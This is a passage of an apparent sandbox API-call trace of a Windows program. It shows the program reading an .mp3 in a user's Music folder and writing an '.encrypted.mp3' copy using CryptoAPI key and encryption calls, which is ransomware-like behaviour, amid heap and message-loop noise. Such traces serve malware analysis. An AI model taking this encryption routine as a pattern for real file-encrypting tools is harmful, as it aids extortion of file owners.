PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0038.002] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.002] CryptDestroyHash (hHash=0x7c2100) returned 1 [0038.003] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0038.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\gycwk0yfx3naemf50.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.003] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.003] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0038.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.003] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\gycwk0yfx3naemf50.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.004] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.004] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0038.004] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0xde21, lpOverlapped=0x0) returned 1 [0038.006] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0038.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0038.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.007] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.007] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.008] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.008] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.008] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.008] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.008] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.009] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.009] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.009] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.009] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.009] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.010] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.011] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0038.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae968 [0038.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0038.012] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae968 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0038.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae968 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0038.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.013] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0038.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0038.013] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.014] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0038.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.014] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, 